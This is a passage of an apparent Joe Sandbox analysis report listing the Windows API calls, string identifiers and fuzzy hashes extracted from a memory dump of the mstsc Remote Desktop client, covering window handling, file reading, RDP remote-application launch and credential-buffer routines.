  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Similarity
• API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
• String ID:
• API String ID: 3463782917-0
APIs
• GetWindowRect.USER32(?,?), ref: 0091FC13
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000216), ref: 0091FCA3
• IsWindowVisible.USER32(00000000), ref: 0091FCFF
• GetClientRect.USER32(?,?), ref: 0091FD13
• SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,00000004), ref: 0091FD36
• GetClientRect.USER32(00000000,?), ref: 0091FD40
• GetClientRect.USER32(?,?), ref: 0091FD4E
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0091FD80
• InvalidateRect.USER32(?,00000000,00000001), ref: 0091FD89
• GetWindowLongW.USER32(00000000,000000EC), ref: 0091FDAB
• GetClientRect.USER32(?,?), ref: 0091FDC7
• GetClientRect.USER32(00000000,?), ref: 0091FDD1
• SetWindowPos.USER32(00000000,00000000,00000000,?,?,?,0000000C), ref: 0091FE0A
• GetDlgItem.USER32(00000000,00003391), ref: 0091FE27
• GetWindowRect.USER32(?,?), ref: 0091FE41
• GetWindowRect.USER32(00000000,?), ref: 0091FE49
• GetWindowRect.USER32(00000000,?), ref: 0091FE53
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 0091FEB5
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,0000000E), ref: 0091FED9
• GetClientRect.USER32(00000000,?), ref: 0091FEE7
• InvalidateRect.USER32(00000000,?,00000001), ref: 0091FF3D
Similarity
• API ID: RectWindow$Client$Invalidate$ItemLongVisible
• String ID: @
• API String ID: 310215485-2766056989
APIs
• SafeArrayUnlock.OLEAUT32(00000000), ref: 00963843
• SafeArrayDestroy.OLEAUT32(00000000), ref: 0096384E
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Similarity
• API ID: ArraySafe$AddressDestroyFreeHandleLibraryModuleProcUnlock
• String ID: AllowSetForegroundWindow failed!$CoCreateInstance failed!$Params.SetAt failed!$bstrCommandLine$bstrRDPFileName$saParams.Create failed!$spRemoteDesktopClient->GetProcessId failed!$spRemoteDesktopClient->StartRemoteApplication failed!$spWorkspace->GetProcessId failed!$spWorkspace->StartRemoteApplication failed!
• API String ID: 2590906998-1740355100
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0093B2F7
• _wtol.MSVCRT ref: 0093B365
• CreateCompatibleDC.GDI32(00000000), ref: 0093B3B5
• SelectObject.GDI32(00000000,?), ref: 0093B3CC
• SetTextColor.GDI32(00000000,00993300), ref: 0093B3DE
• SetBkMode.GDI32(00000000,00000001), ref: 0093B3E7
• SetMapMode.GDI32(00000000,00000001), ref: 0093B3F0
• GetClientRect.USER32(?,?), ref: 0093B406
• GetWindowLongW.USER32(?,000000EC), ref: 0093B440
• DeleteObject.GDI32(?), ref: 0093B54B
• SelectObject.GDI32(00000000,00000000), ref: 0093B586
• SelectObject.GDI32(00000000,00000000), ref: 0093B594
• DrawTextW.USER32(00000000,?,?,?,?), ref: 0093B5C8
• GetLastError.KERNEL32 ref: 0093B5F4
• SelectObject.GDI32(00000000,?), ref: 0093B65D
• SelectObject.GDI32(00000000,?), ref: 0093B66F
• DeleteDC.GDI32(00000000), ref: 0093B676
• DeleteObject.GDI32(?), ref: 0093B73E
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$Select$Delete$LongModeTextWindow$AddressClientColorCompatibleCreateDrawErrorFreeHandleLastLibraryMessageModuleProcRectTrace_wtol
                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                    • API String ID: 1029568502-2564639436
                                                                                                                                                                                    • Opcode ID: 6dd857930eacb7b4be94aa7425c5e7a3c792e8f982d4e103e6fb4d4118ecbc43
                                                                                                                                                                                    • Instruction ID: 0fee14ea432b1f8ddfa3be419e51f6e40402c65d7d57a203ed606c6acabe2baf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dd857930eacb7b4be94aa7425c5e7a3c792e8f982d4e103e6fb4d4118ecbc43
                                                                                                                                                                                    • Instruction Fuzzy Hash: FAD1B371A08314AFDB25DF64DC88BAA7BB9EB89304F144089F605A72A2C771DD80EF55
APIs
• _wcsicmp.MSVCRT ref: 0091510B
• CreateFileW.KERNEL32(00900A48,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00915154
• GetLastError.KERNEL32 ref: 00915163
• CreateFileW.KERNEL32(8B55F12B,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009151D0
• GetLastError.KERNEL32 ref: 009151DF
• GetFileSize.KERNEL32(?,00000000), ref: 0091523C
• GetFileSize.KERNEL32(?,00000000), ref: 00915245
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00915254
• CloseHandle.KERNEL32(?), ref: 009152F7
• CloseHandle.KERNEL32(?), ref: 00915303
• LocalFree.KERNEL32(?), ref: 00915314
• LocalFree.KERNEL32(00000000), ref: 0091531B
• ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00915337
• GetLastError.KERNEL32 ref: 00915341
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00915396
• GetLastError.KERNEL32 ref: 009153A0
• memcmp.MSVCRT ref: 00915400
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: File$ErrorLast$Local$CloseCreateFreeHandleReadSize$Alloc_wcsicmpmemcmp
• String ID: HKEY_DYN_DATA
• API String ID: 2972365698-3361149836
• Opcode ID: 37b72bc86f5f88ac37d335127d7a202a22978313b1fe093136d3fcfc640196cc
• Instruction ID: 072d573dea7d99758482bce6ee9ac877cf04137fc71e19d468a38898b108a62b
• Opcode Fuzzy Hash: 37b72bc86f5f88ac37d335127d7a202a22978313b1fe093136d3fcfc640196cc
• Instruction Fuzzy Hash: 7891E172708304EFD7259F24DC88F6A3BA9EB89354F16494DF961A71A1D7B0CC80EB51
APIs
  • Part of subcall function 0095B1E5: memset.MSVCRT ref: 0095B20A
  • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000100), ref: 0095B23A
  • Part of subcall function 0095B1E5: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000100), ref: 0095B242
  • Part of subcall function 0095B1E5: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 0095B24F
• LoadLibraryExW.KERNEL32(sspicli.dll,00000000,00000000), ref: 0095902E
• GetLastError.KERNEL32 ref: 00959065
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
• GetProcAddress.KERNEL32(00000000,SspiUnmarshalAuthIdentity), ref: 0095908E
• GetLastError.KERNEL32 ref: 009590C1
• GetLastError.KERNEL32 ref: 00959229
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$AddressConditionLibraryMaskProc$FreeHandleInfoLoadModuleVerifyVersionmemset
• String ID: SspiFreeAuthIdentity$SspiLocalFree$SspiPrepareForCredRead$SspiPrepareForCredWrite$SspiUnmarshalAuthIdentity$sspicli.dll
• API String ID: 2657807142-4078069544
• Opcode ID: 27cb8df35af52d0cf6e32449d162cd71de19933c8db95da7afa68df21914f278
• Instruction ID: d34740e11029cb7629226fff90cdbd17f006f3f3660ff1cf7d2fb405d0969b35
• Opcode Fuzzy Hash: 27cb8df35af52d0cf6e32449d162cd71de19933c8db95da7afa68df21914f278
• Instruction Fuzzy Hash: 5B51F271918306BEFB29CF66AD19F227B99BB0A315F050449FD00A71B2C7A0DC94EF91
APIs
• memset.MSVCRT ref: 0091624F
• GetVersionExA.KERNEL32(00000094), ref: 00916268
• GetModuleHandleW.KERNEL32(USER32), ref: 00916284
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 009162A0
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 009162B1
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 009162C2
• GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 009162D3
• GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 009162E4
• GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 009162F5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00916315
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: AddressProc$HandleModuleVersionmemset
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
• API String ID: 1373713818-2451437823
• Opcode ID: d495f9ed3d9860d4f7d5a4a686a2be50404846540991b5b5c4126cb438823468
• Instruction ID: 95e562e0bd992e2e1735ac5c6ab89b23f2c756d618faf3fd70522fd1e403ce2f
• Opcode Fuzzy Hash: d495f9ed3d9860d4f7d5a4a686a2be50404846540991b5b5c4126cb438823468
• Instruction Fuzzy Hash: 2D31A5B1A283159BC7109F799C85A6A7AFCEB4D754B80002EE505E21D0DFF4C542EF93
APIs
  • Part of subcall function 0094B6E6: memset.MSVCRT ref: 0094B70B
  • Part of subcall function 0094B6E6: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,?,00000000), ref: 0094B739
  • Part of subcall function 0094B6E6: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003,?,?,00000000), ref: 0094B741
  • Part of subcall function 0094B6E6: VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 0094B74E
• LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000000), ref: 0094EB83
• GetProcAddress.KERNEL32(00000000,RtlEqualDomainName), ref: 0094EBDC
• memset.MSVCRT ref: 0094EC8A
• memset.MSVCRT ref: 0094ECA0
• LoadLibraryExW.KERNEL32(normaliz.dll,00000000,00000000), ref: 0094ECAF
• FreeLibrary.KERNEL32(00000000), ref: 0094EE79
• FreeLibrary.KERNEL32(00000000), ref: 0094EE84
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Library$Freememset$AddressConditionLoadMaskProc$HandleInfoMessageModuleTraceVerifyVersion
• String ID: IdnToNameprepUnicode$IdnToUnicode$RtlEqualDomainName$normaliz.dll$ntdll.dll$xn--
• API String ID: 2797081027-3313525300
• Opcode ID: 87ff8d8b3d847fe6ccdcb479ccd90c678cf229cdeb29ba43d9c6832b1bb0354c
• Instruction ID: 47a3975fa38571ed7742000ec8068a0fb832e54e8d5670866a280d799405a522
• Opcode Fuzzy Hash: 87ff8d8b3d847fe6ccdcb479ccd90c678cf229cdeb29ba43d9c6832b1bb0354c
• Instruction Fuzzy Hash: 9591CD71608341AFD725DFA4D849F6B7BE9BF88304F040919F984E71A2DB70C944EB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,0000331D,?,?), ref: 00936B3B
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,0000331E,?,00000104), ref: 00936B61
                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,0000331F,?,00000104), ref: 00936B75
                                                                                                                                                                                      • Part of subcall function 00961C30: GetDlgItem.USER32(?,0096A070), ref: 00961C4E
                                                                                                                                                                                      • Part of subcall function 00961C30: EnableWindow.USER32(00000000), ref: 00961C55
                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000110,?,?), ref: 00936BAF
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331E), ref: 00936BC4
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BCD
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331F), ref: 00936BDB
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BDE
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003320), ref: 00936BEC
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936BEF
                                                                                                                                                                                    • GetDlgItem.USER32(?,00003321), ref: 00936BFD
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936C00
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000110,?,00000110,00000000), ref: 00936C30
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000331E,-00006E98), ref: 00936C4A
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000331F,-000070A0), ref: 00936C5A
                                                                                                                                                                                    • CheckDlgButton.USER32(?,0000331D,00000000), ref: 00936C70
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331D), ref: 00936C8B
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936C92
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000331E), ref: 00936CC7
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00936CCE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Enable$Text$Button$Checked$Check
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1908904388-0
                                                                                                                                                                                    • Opcode ID: a6b81f04ce43243ecbe8710b27c7a609384d51ebfa2717e46e6c8497c594ba6c
                                                                                                                                                                                    • Instruction ID: 900accc8d5fe471b417a5b2c7e603d46b707e911474f27551f7f7345b198de04
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6b81f04ce43243ecbe8710b27c7a609384d51ebfa2717e46e6c8497c594ba6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD51C4B1610118AFDB11DF68CC88EBA77BCEB49700F4440A9F685DB2A1CB74AE40DF61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000202,00000000,00000001,?,?,00000000,?), ref: 0094B2B8
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000404), ref: 0094B2CF
                                                                                                                                                                                    • CredUnPackAuthenticationBufferW.CREDUI(00000001,?,00000101,00000000,?,00000000,00000000,00000000,?), ref: 0094B301
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094B30F
                                                                                                                                                                                    • CredUnPackAuthenticationBufferW.CREDUI(00000001,00000101,00000101,00000000,?,00000000,00000000,00000000,00000101), ref: 0094B3A1
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0094B5E2
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 0094B5ED
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$AllocAuthenticationBufferCredFreePack$ErrorLast
                                                                                                                                                                                    • String ID: StringCchCopy failed!$StringCchLength failed!
                                                                                                                                                                                    • API String ID: 3028302246-3392236819
                                                                                                                                                                                    • Opcode ID: 001e476dad851f36ae9fada93c0013063fb565cb4e655d3c15a7eed0bfc1b67a
                                                                                                                                                                                    • Instruction ID: ac5adb58688fb8670e5404ec1321bb86be6336bda27a2ff5a02aa83f76ac07e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 001e476dad851f36ae9fada93c0013063fb565cb4e655d3c15a7eed0bfc1b67a
                                                                                                                                                                                    • Instruction Fuzzy Hash: DCC17A70B04309AFDB15CFA5C895FAABBA9EF49304F104069F901AB2A2DBB4DD41DB10
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009587E5: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 009587F5
                                                                                                                                                                                      • Part of subcall function 009587E5: GetLastError.KERNEL32 ref: 00958800
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 009588BC
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 009588CC
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00958909
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958913
                                                                                                                                                                                    • memset.MSVCRT ref: 00958A1A
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00958A31
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00958A3C
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958A44
                                                                                                                                                                                    • IsTextUnicode.ADVAPI32(00000000,?,?), ref: 00958ADC
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00958B3C
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040), ref: 00958B46
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000), ref: 00958BA0
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00958BA6
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 009589C9
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00958C29
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Local$ErrorFileFreeLast$AllocByteCharMultiReadWide$AddressHandleLibraryMessageModulePointerProcSizeTextTraceUnicodememset
                                                                                                                                                                                    • String ID: Failed to move pointer to the beginning of the file!
                                                                                                                                                                                    • API String ID: 3919189811-3433327527
                                                                                                                                                                                    • Opcode ID: a00593b508c1a5a5de6bd5f93bacc5005e3fd73d0207962d3eaf5c4ae0af3f2e
                                                                                                                                                                                    • Instruction ID: 6f69b33cc40ee2771b76e4e236fef170f9bca41fc091d1ca0b08079f4c2e1b66
                                                                                                                                                                                    • Opcode Fuzzy Hash: a00593b508c1a5a5de6bd5f93bacc5005e3fd73d0207962d3eaf5c4ae0af3f2e
                                                                                                                                                                                    • Instruction Fuzzy Hash: CCC11471608341AFD721DF26DC44B2B7BE9AB49321F040519FD91BB2A2CB74CC48EB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0091727F
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00917288
                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00917291
                                                                                                                                                                                    • CreateMenu.USER32 ref: 00917451
                                                                                                                                                                                    • InsertMenuW.USER32 ref: 009174E1
                                                                                                                                                                                    • InsertMenuW.USER32 ref: 009175F0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176BB
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176C4
                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009176CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • QueryInterface failed for IMsRdpExtendedSettings, xrefs: 009172DF
                                                                                                                                                                                    • RailMode, xrefs: 0091732E
                                                                                                                                                                                    • TSGTransportIsUsed, xrefs: 00917543
                                                                                                                                                                                    • Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED), xrefs: 00917414
                                                                                                                                                                                    • ServerSupportsEdgeActions, xrefs: 009173DE
                                                                                                                                                                                    • Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL), xrefs: 00917358
                                                                                                                                                                                    • Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED), xrefs: 00917579
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInitMenu$Insert$AddressCreateFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: QueryInterface failed for IMsRdpExtendedSettings$RailMode$ServerSupportsEdgeActions$TSGTransportIsUsed$Unable to get property (TS_PROP_CORE_CONNECTION_IS_RAIL)$Unable to get property (TS_PROP_CORE_EDGE_ACTIONS_SUPPORTED)$Unable to get property (TS_PROP_TRANSPORT_TSG_IS_USED)
                                                                                                                                                                                    • API String ID: 847888681-1683191911
                                                                                                                                                                                    • Opcode ID: a29c9e6583ccdc164ea9ebaed23336410b65d5be91f97e194dcece33bb5a7ebf
                                                                                                                                                                                    • Instruction ID: ef17f1c5a1ebd30ab06284164d992bdcb6fff94271cc8b14899c3e772f288a92
                                                                                                                                                                                    • Opcode Fuzzy Hash: a29c9e6583ccdc164ea9ebaed23336410b65d5be91f97e194dcece33bb5a7ebf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CC1C17174C309AEDB25DF94DC59FA9BBBAAB88300F140488F515AB1E2C6B4DDC0AF51
APIs
• SysFreeString.OLEAUT32(?), ref: 00934286
• SysFreeString.OLEAUT32(?), ref: 00934293
• SysFreeString.OLEAUT32(?), ref: 009342A0
• SysFreeString.OLEAUT32(00000000), ref: 009342A7
• SysFreeString.OLEAUT32(?), ref: 009342B4
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,00000000,00000000,?,00000000), ref: 009342F3
• GetLastError.KERNEL32 ref: 0093431B
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0093433E
• SysAllocString.OLEAUT32(?), ref: 00934364
• SysAllocString.OLEAUT32(?), ref: 009343B9
• SysAllocString.OLEAUT32(?), ref: 00934413
• SysAllocString.OLEAUT32(?), ref: 0093446D
• SysAllocString.OLEAUT32(?), ref: 009344C6
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: String$Free$Alloc$ErrorLast$AddressCurrentDirectoryHandleLibraryMessageModuleProcTrace
• String ID: BSTR$CTscComHelper::StartRemoteApplication failed!$LoadConnectionSharingSettings failed
• API String ID: 2183484674-128383092
• Opcode ID: 6517f768b5f94184f1eabc83c96ff07a2a7ba819a79dad220a7c568dcd37894c
• Instruction ID: 5be816e56b85cb47dc8dfd8632096870058938f4b18db4abd86715f1a2898758
• Opcode Fuzzy Hash: 6517f768b5f94184f1eabc83c96ff07a2a7ba819a79dad220a7c568dcd37894c
• Instruction Fuzzy Hash: 29B1C171A04358AFCB35CF24CC89B6A7BE9AB48314F164099F904F72A2C674ED90DF55
APIs
• LocalAlloc.KERNEL32(00000040,00000202,?,?,?,00000004), ref: 0095A1BC
• LocalAlloc.KERNEL32(00000040,00000404), ref: 0095A216
• GetLastError.KERNEL32 ref: 0095A29B
• LocalFree.KERNEL32(?), ref: 0095A2B8
• LocalAlloc.KERNEL32(00000040,?), ref: 0095A2C9
• LocalFree.KERNEL32(00000000), ref: 0095A32B
• LocalAlloc.KERNEL32(00000040,00000101), ref: 0095A33C
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• CredUnPackAuthenticationBufferW.CREDUI(00000000,?,?,00000000,?,00000000,00000000,00000000,00000101), ref: 0095A363
